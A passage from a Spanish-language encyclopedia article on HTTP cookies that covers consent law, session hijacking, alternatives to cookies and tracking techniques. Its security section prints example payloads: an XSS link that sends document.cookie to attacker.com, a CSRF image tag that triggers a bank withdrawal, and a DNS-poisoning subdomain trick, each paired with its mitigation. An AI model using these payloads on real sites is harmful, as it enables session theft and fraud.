Tanto los estudios académicos como los organismos reguladores describen un incumplimiento generalizado de la ley. Un estudio que analizó 10 000 sitios web del Reino Unido encontró que solo el 11,8 % de los sitios cumplían con los requisitos legales mínimos, y solo el 33,4 % de los sitios web estudiados proporcionaban un mecanismo para rechazar las cookies que fuera tan fácil de usar como aceptarlas. [ 79 ] Un estudio de 17 000 sitios web encontró que el 84 % de los sitios incumplían este criterio, y encontró además que muchos colocaban cookies de terceros sin ningún aviso. [ 85 ] El organismo regulador del Reino Unido, la Oficina del Comisionado de Información , declaró en 2019 que el "Marco de Transparencia y Consentimiento" de la industria, del grupo de tecnología publicitaria Interactive Advertising Bureau, era "insuficiente para garantizar la transparencia y el procesamiento justo de los datos personales en cuestión y, por lo tanto, también insuficiente para proporcionar un consentimiento libre e informado, con las consiguientes implicaciones para el cumplimiento de la PECR [e-Privacy]". [ 81 ] Muchas empresas que venden soluciones de cumplimiento (Plataformas de Gestión de Consentimiento) permiten que se configuren de maneras manifiestamente ilegales, lo que, según han señalado los académicos, plantea interrogantes sobre la asignación adecuada de responsabilidad. [ 86 ]

Se propuso una especificación del W3C llamada P3P para que los servidores comunicaran su política de privacidad a los navegadores, permitiendo un manejo automático y configurable por el usuario. Sin embargo, pocos sitios web implementan la especificación, y el W3C ha interrumpido el trabajo en ella. [ 87 ]

La mayoría de los navegadores pueden bloquear las cookies de terceros para aumentar la privacidad y reducir el seguimiento por parte de las empresas de publicidad y seguimiento sin afectar negativamente la experiencia web del usuario en todos los sitios. Algunos sitios utilizan «muros de cookies», que condicionan el acceso a un sitio a permitir las cookies, ya sea técnicamente en un navegador, pulsando «aceptar», o ambas cosas. [ 88 ] En 2020, el Comité Europeo de Protección de Datos , compuesto por todos los reguladores de protección de datos de la UE, declaró que los muros de cookies eran ilegales.

Para que el consentimiento se otorgue libremente, el acceso a los servicios y funcionalidades no debe estar condicionado al consentimiento del usuario para el almacenamiento de información, o para el acceso a información ya almacenada, en el equipo terminal del usuario (los llamados muros de cookies). [ 89 ]

Muchos operadores publicitarios ofrecen la opción de exclusión voluntaria de la publicidad conductual, mediante una cookie genérica en el navegador que la bloquea. [ 90 ] [ 91 ] Sin embargo, esto suele ser ineficaz contra muchas formas de seguimiento, como el seguimiento de origen, que está ganando popularidad para evitar el impacto del bloqueo de cookies de terceros por parte de los navegadores. [ 92 ] [ 93 ] Además, si esta configuración es más difícil de establecer que la aceptación del seguimiento, sigue infringiendo las condiciones de la Directiva sobre privacidad electrónica. [ 79 ]

La mayoría de los sitios web utilizan cookies como único identificador de sesión, ya que otros métodos presentan limitaciones y vulnerabilidades. Si un sitio web utiliza cookies como identificadores de sesión, los atacantes pueden suplantar la identidad de los usuarios robando el conjunto completo de cookies de las víctimas. Desde la perspectiva del servidor web, una solicitud del atacante tiene la misma autenticación que las solicitudes de la víctima; por lo tanto, se realiza en nombre de la sesión de la víctima.

Aquí se enumeran varios escenarios de robo de cookies y secuestro de sesión de usuario (incluso sin robar las cookies del usuario) que funcionan con sitios web que dependen exclusivamente de cookies HTTP para la identificación del usuario.

Intercepción de comunicaciones en la red

Una cookie puede ser robada por otro ordenador que tenga permiso para leer desde la red.

El tráfico en una red puede ser interceptado y leído por ordenadores de la red distintos del remitente y el receptor (especialmente en redes Wi-Fi abiertas y sin cifrar ). Este tráfico incluye las cookies enviadas en sesiones HTTP ordinarias sin cifrar . Cuando el tráfico de red no está cifrado, los atacantes pueden, por lo tanto, leer las comunicaciones de otros usuarios de la red, incluidas las cookies HTTP, así como el contenido completo de las conversaciones, con el fin de realizar un ataque de intermediario (man-in-the-middle) .

Un atacante podría utilizar las cookies interceptadas para suplantar la identidad de un usuario y realizar una tarea maliciosa, como transferir dinero de la cuenta bancaria de la víctima.

Este problema se puede resolver protegiendo la comunicación entre el ordenador del usuario y el servidor mediante el protocolo HTTPS ( Transport Layer Security ) para cifrar la conexión. Un servidor puede especificar una bandera al configurar una cookie, lo que hará que el navegador envíe la cookie únicamente a través de un canal cifrado, como una conexión TLS. [ 45 ]Secure

Publicación de subdominio falso: envenenamiento de la caché DNS

Si un atacante logra que un servidor DNS almacene en caché una entrada DNS falsificada (lo que se conoce como envenenamiento de caché DNS ), podría obtener acceso a las cookies de un usuario. Por ejemplo, un atacante podría usar el envenenamiento de caché DNS para crear una entrada DNS falsificada que f12345.www.example.comapunte a la dirección IP de su servidor. Luego, podría publicar una URL de imagen desde su propio servidor (por ejemplo, http://f12345.www.example.com/img_4_cookie.jpg). Las víctimas que lean el mensaje del atacante descargarían esta imagen desde f12345.www.example.com. Dado que f12345.www.example.comes un subdominio de www.example.com, los navegadores de las víctimas enviarían todas example.comlas cookies relacionadas con al servidor del atacante.

Si un atacante logra esto, generalmente es culpa de los proveedores de servicios de Internet por no proteger adecuadamente sus servidores DNS. Sin embargo, la gravedad de este ataque puede disminuir si el sitio web objetivo utiliza cookies seguras. En este caso, el atacante tendría el desafío adicional [ 94 ] de obtener el certificado TLS del sitio web objetivo de una autoridad de certificación , ya que las cookies seguras solo pueden transmitirse a través de una conexión cifrada. Sin un certificado TLS coincidente, los navegadores de las víctimas mostrarían un mensaje de advertencia sobre el certificado no válido del atacante, lo que ayudaría a disuadir a los usuarios de visitar el sitio web fraudulento del atacante y enviarle sus cookies.

Las cookies también pueden ser robadas mediante una técnica llamada secuencias de comandos entre sitios (XSS). Esto ocurre cuando un atacante se aprovecha de un sitio web que permite a sus usuarios publicar contenido HTML y JavaScript sin filtrar . Al publicar código HTML y JavaScript malicioso, el atacante puede lograr que el navegador web de la víctima envíe sus cookies a un sitio web controlado por el atacante.

Por ejemplo, un atacante podría publicar un mensaje www.example.comcon el siguiente enlace:

<a href="#" onclick="window.location='http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;"> ¡ Haz clic aquí ! </a>
Secuencias de comandos entre sitios (XSS): una cookie que solo debería intercambiarse entre un servidor y un cliente se envía a un tercero.

Cuando otro usuario hace clic en este enlace, el navegador ejecuta el fragmento de código dentro del onclickatributo, reemplazando así la cadena document.cookiecon la lista de cookies accesibles desde la página actual. Como resultado, esta lista de cookies se envía al attacker.comservidor. Si la publicación maliciosa del atacante se encuentra en un sitio web HTTPS https://www.example.com, las cookies seguras también se enviarán a attacker.com en texto plano.

Es responsabilidad de los desarrolladores del sitio web filtrar ese código malicioso.

Estos ataques pueden mitigarse mediante el uso de cookies HttpOnly. Estas cookies no serán accesibles para lenguajes de programación del lado del cliente como JavaScript, por lo que el atacante no podrá obtenerlas.

Secuencias de comandos entre sitios: solicitud de proxy

En versiones anteriores de muchos navegadores, existían vulnerabilidades de seguridad en la implementación de la API XMLHttpRequest . Esta API permite que las páginas especifiquen un servidor proxy que recibirá la respuesta, y este servidor proxy no está sujeto a la política del mismo origen . Por ejemplo, una víctima está leyendo una publicación de un atacante en www.example.com, y el script del atacante se ejecuta en el navegador de la víctima. El script genera una solicitud a www.example.comcon el servidor proxy attacker.com. Dado que la solicitud es para www.example.com, todas example.comlas cookies se enviarán junto con la solicitud, pero enrutadas a través del servidor proxy del atacante. Por lo tanto, el atacante podría obtener las cookies de la víctima.

Este ataque no funcionaría con cookies seguras, ya que solo se pueden transmitir mediante conexiones HTTPS , y el protocolo HTTPS exige cifrado de extremo a extremo (es decir, la información se cifra en el navegador del usuario y se descifra en el servidor de destino). En este caso, el servidor proxy solo vería los bytes cifrados de la solicitud HTTP.

Falsificación de solicitudes entre sitios

Por ejemplo, Bob podría estar navegando por un foro de chat donde otra usuaria, Mallory, ha publicado un mensaje. Supongamos que Mallory ha creado un elemento de imagen HTML que hace referencia a una acción en el sitio web del banco de Bob (en lugar de un archivo de imagen), por ejemplo,

<img src= "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Si el banco de Bob guarda su información de autenticación en una cookie, y si la cookie no ha caducado, entonces el intento del navegador de Bob de cargar la imagen enviará el formulario de retiro con su cookie, autorizando así una transacción sin la aprobación de Bob.

Cookiejacking

El cookiejacking es un ataque contra Internet Explorer que permite al atacante robar las cookies de sesión de un usuario engañándolo para que arrastre un objeto por la pantalla. [ 95 ] Microsoft consideró que la vulnerabilidad era de bajo riesgo debido al "nivel de interacción del usuario requerido" [ 95 ] y a la necesidad de que el usuario ya hubiera iniciado sesión en el sitio web cuya cookie se roba. [ 96 ] A pesar de esto, un investigador probó el ataque en 150 de sus amigos de Facebook y obtuvo las cookies de 80 de ellos mediante ingeniería social . [ 95 ]

Desventajas de las cookies

Además de las preocupaciones sobre la privacidad, las cookies también presentan algunos inconvenientes técnicos. En particular, no siempre identifican con precisión a los usuarios, pueden utilizarse para ataques de seguridad y, a menudo, son incompatibles con el estilo arquitectónico de software REST (Representational State Transfer ). [ 97 ] [ 98 ]

Identificación inexacta

Si se utiliza más de un navegador en un ordenador, cada uno suele tener un área de almacenamiento independiente para las cookies. Por lo tanto, las cookies no identifican a una persona, sino una combinación de una cuenta de usuario, un ordenador y un navegador web. Así pues, cualquier persona que utilice varias cuentas, ordenadores o navegadores tendrá varios conjuntos de cookies. [ 99 ]

Del mismo modo, las cookies no distinguen entre varios usuarios que comparten la misma cuenta de usuario , ordenador y navegador.

Alternativas a las cookies

Algunas de las operaciones que se pueden realizar utilizando cookies también se pueden realizar utilizando otros mecanismos.

Autenticación y gestión de sesiones

Tokens web JSON

Un JSON Web Token (JWT) es un paquete de información autónomo que se puede usar para almacenar la identidad y la autenticidad del usuario. Esto permite utilizarlos en lugar de las cookies de sesión. A diferencia de las cookies, que el navegador adjunta automáticamente a cada solicitud HTTP, los JWT deben adjuntarse explícitamente a cada solicitud HTTP por parte de la aplicación web.

autenticación HTTP

El protocolo HTTP incluye los protocolos de autenticación básica y de resumen , que permiten el acceso a una página web únicamente cuando el usuario ha proporcionado el nombre de usuario y la contraseña correctos. Si el servidor requiere estas credenciales para conceder acceso a una página web, el navegador las solicita al usuario y, una vez obtenidas, las almacena y las envía en cada solicitud de página posterior. Esta información puede utilizarse para rastrear al usuario.

URL (cadena de consulta)

La parte de la URL que corresponde a la consulta es la que se suele utilizar para este fin, pero también se pueden usar otras partes. Tanto el mecanismo de sesión de Java Servlet como el de PHP utilizan este método si las cookies no están habilitadas.

Este método consiste en que el servidor web añade cadenas de consulta que contienen un identificador de sesión único a todos los enlaces de una página web. Cuando el usuario accede a un enlace, el navegador envía la cadena de consulta al servidor, lo que permite a este identificar al usuario y mantener el estado de la sesión.

Este tipo de cadenas de consulta son muy similares a las cookies, ya que ambas contienen información arbitraria elegida por el servidor y se envían de vuelta al servidor con cada solicitud. Sin embargo, existen algunas diferencias. Dado que una cadena de consulta forma parte de una URL, si esta se reutiliza posteriormente, la misma información adjunta se enviará al servidor, lo que podría generar confusión. Por ejemplo, si las preferencias de un usuario están codificadas en la cadena de consulta de una URL y este usuario envía dicha URL a otro usuario por correo electrónico , esas preferencias también se utilizarán para ese otro usuario.

Además, si un mismo usuario accede a la misma página varias veces desde distintas fuentes, no hay garantía de que se utilice la misma cadena de consulta en cada ocasión. Por ejemplo, si un usuario visita una página desde una página interna del sitio la primera vez y luego la visita desde un motor de búsqueda externo la segunda vez, es probable que las cadenas de consulta sean diferentes. Si se utilizaran cookies en este caso, estas serían las mismas.

Otras desventajas de las cadenas de consulta están relacionadas con la seguridad. Almacenar datos que identifican una sesión en una cadena de consulta permite ataques de fijación de sesión , ataques de registro de referencia y otras vulnerabilidades de seguridad . Transferir los identificadores de sesión como cookies HTTP es más seguro.

campos de formulario ocultos

Otra forma de seguimiento de sesiones consiste en usar formularios web con campos ocultos. Esta técnica es muy similar a usar cadenas de consulta en la URL para almacenar la información y presenta muchas de las mismas ventajas e inconvenientes. De hecho, si el formulario se gestiona con el método HTTP GET, esta técnica es similar a usar cadenas de consulta en la URL, ya que el método GET agrega los campos del formulario a la URL como una cadena de consulta. Sin embargo, la mayoría de los formularios se gestionan con HTTP POST, lo que provoca que la información del formulario, incluidos los campos ocultos, se envíe en el cuerpo de la solicitud HTTP, que no forma parte ni de la URL ni de una cookie.

Este enfoque presenta dos ventajas desde el punto de vista del sistema de seguimiento. En primer lugar, al ubicar la información de seguimiento en el cuerpo de la solicitud HTTP en lugar de en la URL, el usuario promedio no la notará. En segundo lugar, la información de la sesión no se copia cuando el usuario copia la URL (para guardar la página en favoritos o enviarla por correo electrónico, por ejemplo).

Propiedad DOM window.name

Todos los navegadores web actuales pueden almacenar una cantidad considerable de datos (entre 2 y 32  MB) mediante JavaScript, utilizando la propiedad DOMwindow.name . Estos datos pueden usarse en lugar de las cookies de sesión. Esta técnica se puede combinar con objetos JSON /JavaScript para almacenar conjuntos complejos de variables de sesión en el lado del cliente.

La desventaja es que cada ventana o pestaña individual tendrá inicialmente una window.namepropiedad vacía al abrirse.

En cierto modo, esto puede ser más seguro que las cookies porque su contenido no se envía automáticamente al servidor con cada solicitud, como sí ocurre con las cookies, por lo que no es vulnerable a los ataques de interceptación de cookies en la red.

Seguimiento

Dirección IP

Es posible que se pueda rastrear a algunos usuarios en función de la dirección IP del ordenador que solicita la página. El servidor conoce la dirección IP del ordenador que ejecuta el navegador (o del proxy , si se utiliza alguno) y, en teoría, podría vincular la sesión de un usuario a esta dirección IP.

Sin embargo, las direcciones IP generalmente no son un método fiable para rastrear una sesión o identificar a un usuario. Muchos ordenadores diseñados para ser utilizados por un solo usuario, como los de oficina o los domésticos, están detrás de un traductor de direcciones de red (NAT). Esto significa que varios ordenadores comparten una dirección IP pública. Además, algunos sistemas, como Tor , están diseñados para mantener el anonimato en Internet , lo que hace que el rastreo mediante direcciones IP sea poco práctico, imposible o un riesgo para la seguridad.

Etiqueta electrónica

Dado que el navegador almacena en caché las ETags y las devuelve con las solicitudes posteriores del mismo recurso, un servidor de seguimiento puede simplemente repetir cualquier ETag recibida del navegador para garantizar que la ETag asignada persista indefinidamente (de forma similar a las cookies persistentes). Los campos de encabezado de caché adicionales también pueden mejorar la conservación de los datos de las ETags.

En algunos navegadores, las etiquetas ETag se pueden eliminar borrando la caché del navegador .

Caché del navegador

La caché del navegador también puede utilizarse para almacenar información que permita rastrear a usuarios individuales. Esta técnica aprovecha que el navegador web utiliza los recursos almacenados en la caché en lugar de descargarlos del sitio web cuando determina que la caché ya contiene la versión más reciente del recurso.

Por ejemplo, un sitio web podría servir un archivo JavaScript con código que establezca un identificador único para el usuario (por ejemplo, var userId = 3243242;). Después de la primera visita del usuario, cada vez que acceda a la página, este archivo se cargará desde la caché en lugar de descargarse del servidor. De esta forma, su contenido nunca cambiará.

Huella digital del navegador

La huella digital del navegador es información recopilada sobre la configuración del navegador, como el número de versión, la resolución de pantalla y el sistema operativo, con fines de identificación. Estas huellas digitales pueden utilizarse para identificar total o parcialmente a usuarios o dispositivos, incluso cuando las cookies están desactivadas.

Los servicios de análisis web han recopilado información básica de configuración del navegador web desde hace tiempo con el fin de medir con precisión el tráfico web humano real y descartar diversas formas de fraude de clics . Con la ayuda de lenguajes de scripting del lado del cliente , es posible recopilar parámetros mucho más esotéricos. [ 100 ] [ 101 ] La asimilación de dicha información en una sola cadena constituye una huella digital del dispositivo. En 2010, la EFF midió al menos 18,1 bits de entropía posibles a partir de la huella digital del navegador. [ 102 ] La huella digital Canvas , una técnica más reciente, afirma añadir otros 5,7 bits.

Almacenamiento web

Algunos navegadores web admiten mecanismos de persistencia que permiten a la página almacenar la información localmente para su uso posterior.

El estándar HTML5 (que la mayoría de los navegadores web modernos admiten en cierta medida) incluye una API de JavaScript llamada Almacenamiento web que permite dos tipos de almacenamiento: almacenamiento local y almacenamiento de sesión. El almacenamiento local se comporta de forma similar a las cookies persistentes, mientras que el almacenamiento de sesión se comporta de forma similar a las cookies de sesión , excepto que el almacenamiento de sesión está vinculado a la vida útil de una pestaña/ventana individual (también conocida como sesión de página), no a una sesión completa del navegador como las cookies de sesión. [ 103 ]

Internet Explorer admite información persistente [ 104 ] en el historial del navegador, en los favoritos del navegador, en un almacén XML ("datos de usuario") o directamente dentro de una página web guardada en el disco.

Algunos complementos de navegadores web también incluyen mecanismos de persistencia. Por ejemplo, Adobe Flash tiene objetos compartidos locales y Microsoft Silverlight tiene almacenamiento aislado. [ 105 ]

Véase también

Referencias

  1. "¿Qué son las cookies? ¿Cuáles son las diferencias entre ellas (de sesión y persistentes)?" . Cisco . 17 de julio de 2018. 117925.
  2. 1 2 Vamosi, Robert (14 de abril de 2008). "Roban la cookie de Gmail a través de Google Spreadsheets" . News.cnet.com . Archivado del original el 9 de diciembre de 2013. Recuperado el 19 de octubre de 2017 .
  3. "¿Qué hay de la "Directiva de cookies de la UE"?" . WebCookies.org. 2013. Archivado del original el 11 de octubre de 2017. Recuperado el 19 de octubre de 2017 .
  4. "Nuevas reglas de internet harán que las cookies se desmoronen" . BBC . 8 de marzo de 2011. Archivado del original el 10 de agosto de 2018. Consultado el 21 de junio de 2018 .
  5. "Senador Rockefeller: Prepárense para una ley real de no seguimiento para la publicidad en línea" . Adage.com . 6 de mayo de 2011. Archivado del original el 24 de agosto de 2011. Consultado el 2 de junio de 2011 .
  6. "De dónde proviene la cookie :: DominoPower" . dominopower.com . Archivado del original el 19 de octubre de 2017. Consultado el 19 de octubre de 2017 . 
  7. Raymond, Eric (ed.). "galleta mágica" . The Jargon File (versión 4.4.7) . Archivado del original el 6 de septiembre de 2017. Recuperado el 8 de septiembre de 2017 .
  8. Schwartz, John (4 de septiembre de 2001). "Darle memoria a la web le costó la privacidad a sus usuarios" . The New York Times . Archivado del original el 18 de noviembre de 2011. Recuperado el 19 de febrero de 2017 .
  9. 1 2 Kesan, Jey; Shah, Rajiv (19 de agosto de 2018). "Deconstruyendo el código". Yale Journal of Law and Technology . 6 : 277– 389. SSRN 597543 . 
  10. 1 2 3 Kristol, David M. (2001). "HTTP Cookies: Standards, Privacy, and Politics". ACM Transactions on Internet Technology . 1 (2). Association for Computing Machinery (ACM): 151– 198. arXiv : cs/0105018 . doi : 10.1145/502152.502153 . ISSN 1533-5399 . S2CID 1848140 .  
  11. "Comunicado de prensa: Netscape Communications ofrece el nuevo Network Navigator gratis en Internet" . Archivado del original el 7 de diciembre de 2006. Consultado el 22 de mayo de 2010 .
  12. "Mensaje de Usenet de Marc Andreessen: ¡Aquí está, mundo!" . 13 de octubre de 1994. Archivado del original el 27 de abril de 2011. Consultado el 22 de mayo de 2010 .
  13. US 5774670 , Montulli, Lou, "Estado persistente del cliente en un sistema cliente-servidor basado en protocolo de transferencia de hipertexto", publicado el 30 de junio de 1998, asignado a Netscape Communications Corp. 
  14. Hardmeier, Sandi (25 de agosto de 2005). "La historia de Internet Explorer" . Microsoft. Archivado del original el 1 de octubre de 2005. Recuperado el 4 de enero de 2009 .
  15. Miyazaki, Anthony D. (2008). "Privacidad en línea y divulgación del uso de cookies: efectos en la confianza del consumidor y la preferencia anticipada" . Journal of Public Policy & Marketing . 27 (1): 19– 33. doi : 10.1509/jppm.27.1.19 . ISSN 0743-9156 . 
  16. Jackson, T (12 de febrero de 1996). "Este error en su PC es muy inteligente". Financial Times .
  17. 1 2 RFC 2109 . IETF . sec. 8.3. doi : 10.17487/RFC2109 . 
  18. "Configuración de cookies" . staff.washington.edu . 19 de junio de 2009. Archivado del original el 16 de marzo de 2017. Consultado el 15 de marzo de 2017 .
  19. La documentación de edbrowse versión 3.5 decía: «Tenga en cuenta que solo se admiten cookies de estilo Netscape. Sin embargo, este es el tipo de cookie más común. Probablemente satisfaga sus necesidades». Este párrafo se eliminó en versiones posteriores de la documentación. Archivado el 16 de marzo de 2017 en Wayback Machine tras la descontinuación de RFC 2965.
  20. Hodges, Jeff; Corry, Bil (6 de marzo de 2011) .'Mecanismo de gestión de estado HTTP' para la norma propuesta" . The Security Practice . Archivado del original el 7 de agosto de 2016. Recuperado el 17 de junio de 2016 .
  21. "Set-Cookie2 - HTTP | MDN" . developer.mozilla.org . Consultado el 8 de marzo de 2021 .
  22. "Descripción de las cookies persistentes y de sesión en Internet Explorer" . support.microsoft.com . 24 de enero de 2007. Archivado del original el 25 de septiembre de 2011.
  23. "Mantener el estado de la sesión con cookies" . Microsoft Developer Network . Archivado del original el 14 de octubre de 2012. Consultado el 22 de octubre de 2012 .
  24. Bujlow, Tomasz; Carela-Espanol, Valentin; Lee, Beom-Ryeol; Barlet-Ros, Pere (2017). "Un estudio sobre el seguimiento web: mecanismos, implicaciones y defensas". Actas del IEEE . 105 (8): 1476– 1510. doi : 10.1109/JPROC.2016.2637878 . hdl : 2117/108437 . ISSN 0018-9219 . 
  25. Rasaii, Ali; Singh, Shivani; Gosain, Devashish; Gasser, Oliver (2023), "Explorando el universo de las cookies: un análisis multiperspectivo de las cookies web" , en Brunstrom, Anna; Flores, Marcel; Fiore, Marco (eds.), Medición pasiva y activa , vol. 13882, Cham: Springer Nature Switzerland, pp. 623–651 , doi : 10.1007/978-3-031-28486-1_26 , ISBN   978-3-031-28485-4Consultado el 24 de agosto de 2024.
  26. Bugliesi, Michele; Calzavara, Stefano; Focardi, Riccardo; Khan, Wilayat (16 de septiembre de 2015). "CookiExt: Parcheando el navegador contra ataques de secuestro de sesión" . Journal of Computer Security . 23 (4): 509– 537. doi : 10.3233/JCS-150529 . hdl : 10278/3663357 .
  27. "Atributo de cookie 'SameSite', estado de la plataforma Chrome" . Chromestatus.com . Archivado del original el 9 de mayo de 2016. Recuperado el 23 de abril de 2016 .
  28. Goodwin, M.; West (20 de junio de 2016). "Cookies del mismo sitio borrador-ietf-httpbis-cookie-same-site-00" . Ietf Datatracker . Archivado del original el 16 de agosto de 2016. Recuperado el 28 de julio de 2016 .
  29. "Requiere "Secure" para "SameSite=None". por miketaylr · Solicitud de extracción n.° 1323 · httpwg/http-extensions" . GitHub . Consultado el 5 de abril de 2021 .
  30. West, Mike; Wilander, John (7 de diciembre de 2020). Cookies: Mecanismo de gestión del estado HTTP (Informe). Grupo de trabajo de ingeniería de Internet.
  31. "Cambios en las cookies SameSite en febrero de 2020: lo que necesitas saber" . Blog de Chromium . Consultado el 5 de abril de 2021 .
  32. "Reversión temporal de los cambios en las cookies SameSite" . Blog de Chromium . Consultado el 5 de abril de 2021 .
  33. Schuh, Justin (28 de mayo de 2020). "Reanudación de los cambios en las cookies SameSite en julio" . Blog de Chromium . Consultado el 18 de febrero de 2024 .
  34. "Más información sobre la Lista Pública de Sufijos" . Publicsuffix.org . Archivado del original el 14 de mayo de 2016. Consultado el 28 de julio de 2016 .
  35. "Un primer vistazo a los perjuicios para la privacidad de la lista pública de sufijos" . Brave . 25 de octubre de 2023. Consultado el 1 de enero de 2026 .
  36. Mayer, Jonathan (19 de agosto de 2011). "Rastreando a los rastreadores: la publicidad de Microsoft" . El Centro para Internet y la Sociedad. Archivado del original el 26 de septiembre de 2011. Recuperado el 28 de septiembre de 2011 .
  37. Vijayan, Jaikumar (19 de agosto de 2011). "Microsoft desactiva las 'supercookies' utilizadas en los visitantes de MSN.com" . Computerworld . Archivado del original el 27 de noviembre de 2014. Consultado el 23 de noviembre de 2014 .
  38. Englehardt, Steven; Edelstein, Arthur (26 de enero de 2021). "Firefox 85 toma medidas enérgicas contra las supercookies" . Blog de seguridad de Mozilla . Archivado del original el 25 de febrero de 2024.
  39. Angwin, Julia ; Tigas, Mike (14 de enero de 2015). "Cookie zombi: la cookie de seguimiento que no puedes matar" . ProPublica . Consultado el 1 de noviembre de 2020 .
  40. Stolze, Conrad (11 de junio de 2011). "¡La galleta que no se desmoronaba!" . Revista 24x7 . Consultado el 1 de noviembre de 2020 .
  41. Peng, Weihong; Cisna, Jennifer (2000). "Cookies HTTP, una tecnología prometedora". ProQuest . Online Information Review. ProQuest 194487945 . 
  42. Jim Manico citando a Daniel Stenberg, Límites de longitud de las cookies en el mundo real. Archivado el 2 de julio de 2013 en Wayback Machine.
  43. Lee, Wei-Bin; Chen, Hsing-Bai; Chang, Shun-Shyan; Chen, Tzung-Her (25 de enero de 2019). "Protección segura y eficiente para cookies HTTP con autoverificación" . International Journal of Communication Systems . 32 (2) e3857. doi : 10.1002/dac.3857 . S2CID 59524143 . 
  44. Rainie, Lee (2012). En red: El nuevo sistema operativo social. pág. 237
  45. 1 2 Mecanismo de gestión de estado HTTP . IETF . doi : 10.17487/RFC6265 . RFC 6265 .
  46. "Cookies HTTP de estado de cliente persistente: Especificación preliminar" . Netscape. c. 1999. Archivado del original el 5 de agosto de 2007.
  47. "Propiedad de cookie" . MSDN . Microsoft. Archivado del original el 5 de abril de 2008. Consultado el 4 de enero de 2009 .
  48. Shannon, Ross (26 de febrero de 2007). "Cookies: Establecer y recuperar información sobre sus lectores" . HTMLSource. Archivado del original el 24 de agosto de 2011. Recuperado el 4 de enero de 2009 .
  49. Barth, A. Mecanismo de gestión de estado HTTP, el atributo de ruta . IETF . sec. 4.1.2.4. doi : 10.17487/RFC6265 . RFC 6265 . 
  50. Barth, A. (marzo de 2014). RFC 6265, Mecanismo de gestión de estado HTTP, coincidencia de dominio . IETF . sec. 5.1.3. doi : 10.17487/RFC6265 . RFC 6265 . 
  51. Barth, A. (marzo de 2014). RFC 6265, Mecanismo de gestión de estado HTTP, El atributo de dominio . IETF . sec. 4.1.2.3. doi : 10.17487/RFC6265 . RFC 6265 . 
  52. "Información interna sobre las cookies de Internet Explorer (Preguntas frecuentes)" . 21 de noviembre de 2018.
  53. ^ Kristol, D.; Montulli, L. (marzo de 2014). RFC 2109, Mecanismo de gestión de estado HTTP, sintaxis Set-Cookie . IETF . segundo. 4.2.2. doi : 10.17487/RFC2109 . S2CID 6914676 . RFC 2109 .  
  54. Barth, A. (2011). RFC 6265, Mecanismo de gestión de estado HTTP . IETF . sec. 5.1.1. doi : 10.17487/RFC6265 . RFC 6265 . 
  55. "Compatibilidad de la especificación de cookies en navegadores modernos" . inikulin.github.io . 2016. Archivado del original el 2 de octubre de 2016. Consultado el 30 de septiembre de 2016 .
  56. Coles, Peter. "Cookies HTTP: ¿Cuál es la diferencia entre Max-age y Expires? – Peter Coles" . Mrcoles.com . Archivado del original el 29 de julio de 2016. Consultado el 28 de julio de 2016 .
  57. Informe de Symantec sobre amenazas a la seguridad en Internet: Tendencias de julio a diciembre de 2007 (Resumen ejecutivo) (PDF) (Informe). Vol. XIII. Symantec Corp. Abril de 2008. págs. 1-3 . Archivado del original (PDF) el 25 de junio de 2008. Consultado el 11 de mayo de 2008 .  
  58. Whalen, David (8 de junio de 2002). "Preguntas frecuentes no oficiales sobre cookies v2.6" . Cookie Central. Archivado del original el 24 de agosto de 2011. Recuperado el 4 de enero de 2009 .
  59. "Cómo administrar las cookies en Internet Explorer 6" . Microsoft. 18 de diciembre de 2007. Archivado del original el 28 de diciembre de 2008. Consultado el 4 de enero de 2009 .
  60. "Borrar datos privados" . Base de conocimientos de soporte de Firefox . Mozilla. 16 de septiembre de 2008. Archivado del original el 3 de enero de 2009. Consultado el 4 de enero de 2009 .
  61. "Borrar información personal: Borrar datos de navegación" . Ayuda de Google Chrome . Archivado del original el 11 de marzo de 2009. Consultado el 4 de enero de 2009 .
  62. "Borrar información personal: Eliminar cookies" . Ayuda de Google Chrome . Archivado del original el 11 de marzo de 2009. Consultado el 4 de enero de 2009 .
  63. "Dominios de terceros" . WebCookies.org. Archivado del original el 9 de diciembre de 2014. Consultado el 7 de diciembre de 2014 .
  64. "Número de cookies" . WebCookies.org. Archivado del original el 9 de diciembre de 2014. Consultado el 7 de diciembre de 2014 .
  65. Statt, Nick (24 de marzo de 2020). "Apple actualiza la tecnología anti-rastreo de Safari con bloqueo total de cookies de terceros" . The Verge . Consultado el 24 de julio de 2020 .
  66. "Firefox comienza a bloquear las cookies de terceros por defecto" . VentureBeat . 4 de junio de 2019. Consultado el 24 de julio de 2020 .
  67. Brave (6 de febrero de 2020). "OK Google, no demores la verdadera privacidad del navegador hasta 2022" . Navegador Brave . Consultado el 24 de julio de 2020 .
  68. Protalinski, Emil (19 de mayo de 2020). "Chrome 83 llega con ajustes de seguridad rediseñados y bloqueo de cookies de terceros en el modo incógnito" . VentureBeat . Consultado el 25 de junio de 2020 .
  69. Amadeo, Ron (24 de abril de 2024). "Google no puede dejar de usar cookies de terceros: los retrasos se suspenden por tercera vez" . Ars Technica . Consultado el 25 de abril de 2024 .
  70. Lawler, Richard (22 de julio de 2024). "El plan de Google para desactivar las cookies de terceros en Chrome está muriendo" . The Verge . Consultado el 29 de julio de 2024 .
  71. Miyazaki, Anthony D. (2008), "Privacidad en línea y divulgación del uso de cookies: efectos en la confianza del consumidor y la preferencia anticipada", Journal of Public Policy & Marketing, 23 (primavera), 19–33
  72. "Agencia de espionaje elimina archivos de seguimiento ilegales" . New York Times . 29 de diciembre de 2005. Archivado del original el 12 de noviembre de 2011. Consultado el 19 de febrero de 2017 .
  73. "Directiva de la UE sobre cookies, Directiva 2009/136/CE" . Información legal de JISC. Archivado del original el 18 de diciembre de 2012. Consultado el 31 de octubre de 2012 .
  74. 1 2 Reglamento sobre privacidad y comunicaciones electrónicas . Oficina del Comisionado de Información. 2012. Archivado del original el 30 de octubre de 2012. Recuperado el 31 de octubre de 2012 .
  75. "Cookies y tecnologías similares" . ico.org.uk. 1 de enero de 2021. Consultado el 6 de junio de 2021 .
  76. 1 2 "EUR-Lex - 62017CN0673 - EN - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  77. ^ Veale , Michael; Zuiderveen Borgesius, Frederik (1 de abril de 2021), Adtech y ofertas en tiempo real según la ley europea de protección de datos , doi : 10.31235/osf.io/wg8fq , hdl : 2066/253518 , S2CID 243311598 
  78. Zuiderveen Borgesius, Frederik J. (agosto de 2015). "Procesamiento de datos personales para la segmentación conductual: ¿qué base legal?" . Derecho Internacional de la Privacidad de Datos . 5 (3): 163– 176. doi : 10.1093/idpl/ipv011 . ISSN 2044-3994 . 
